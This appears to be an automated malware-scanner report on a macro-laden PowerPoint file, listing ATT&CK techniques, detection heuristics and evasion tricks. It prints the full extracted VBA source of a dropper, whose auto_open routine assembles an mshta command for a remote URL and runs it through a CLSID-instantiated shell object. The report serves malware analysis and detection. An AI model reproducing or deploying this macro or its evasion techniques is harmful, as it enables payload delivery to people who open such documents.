MALICIOUS
270
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.010 System Binary Proxy Execution: Regsvr32
The OOXML document contains a VBA macro with an auto_open subroutine. This macro leverages the WScript.Shell COM object to execute a command constructed from concatenated strings. The reconstructed command is 'mshta https://1230948%1230948@bitly.com/awiewakdhikhasd', which indicates an attempt to download and execute a payload from the provided URL using mshta.exe.
Heuristics 8
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/paap.bin)
-
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Case 1 getEnumName = "mshta " Case 2 -
VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUSVBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.Matched line in script
Public Function myvalue() Set myvalue = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") End Function -
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMEDThe VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Public Function myvalue() Set myvalue = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B") End Function -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Attribute VB_Name = "Module11" Sub auto_open() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://1230948%1230948@bitly.com/awiewakdhikhasd In document text (OOXML body / shared strings)
- https://1230948%1230948@bitly.com/awiewakdhikhaIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1004 bytes |
SHA-256: 92ef8af4be7940f0586f1d9d57115664fcb6f77d32d1fb3d12bea9405812fb7a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Enum myenum
myname1 = 1
myname2 = 2
myname3 = 3
myname4 = 4
End Enum
Public Function getEnumName(eValue As myenum)
Select Case eValue
Case 1
getEnumName = "mshta "
Case 2
getEnumName = " https://1230948%1230948@bitly.com/awiewakdhikhasd"
End Select
End Function
Public Function myvalue()
Set myvalue = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")
End Function
Attribute VB_Name = "Module11"
Sub auto_open()
Dim bora As New Class1
Dim NamakBora, lora As String
NamakBora = bora.getEnumName(1)
lora = bora.getEnumName(2)
lora2 = NamakBora + lora
bora. _
myvalue. _
Run lora2
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/paap.bin | 18944 bytes |
SHA-256: d922dbafa87afa4e9832d62d3538327abcf9e3526419f7ac72a8a4be2229e2e9 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.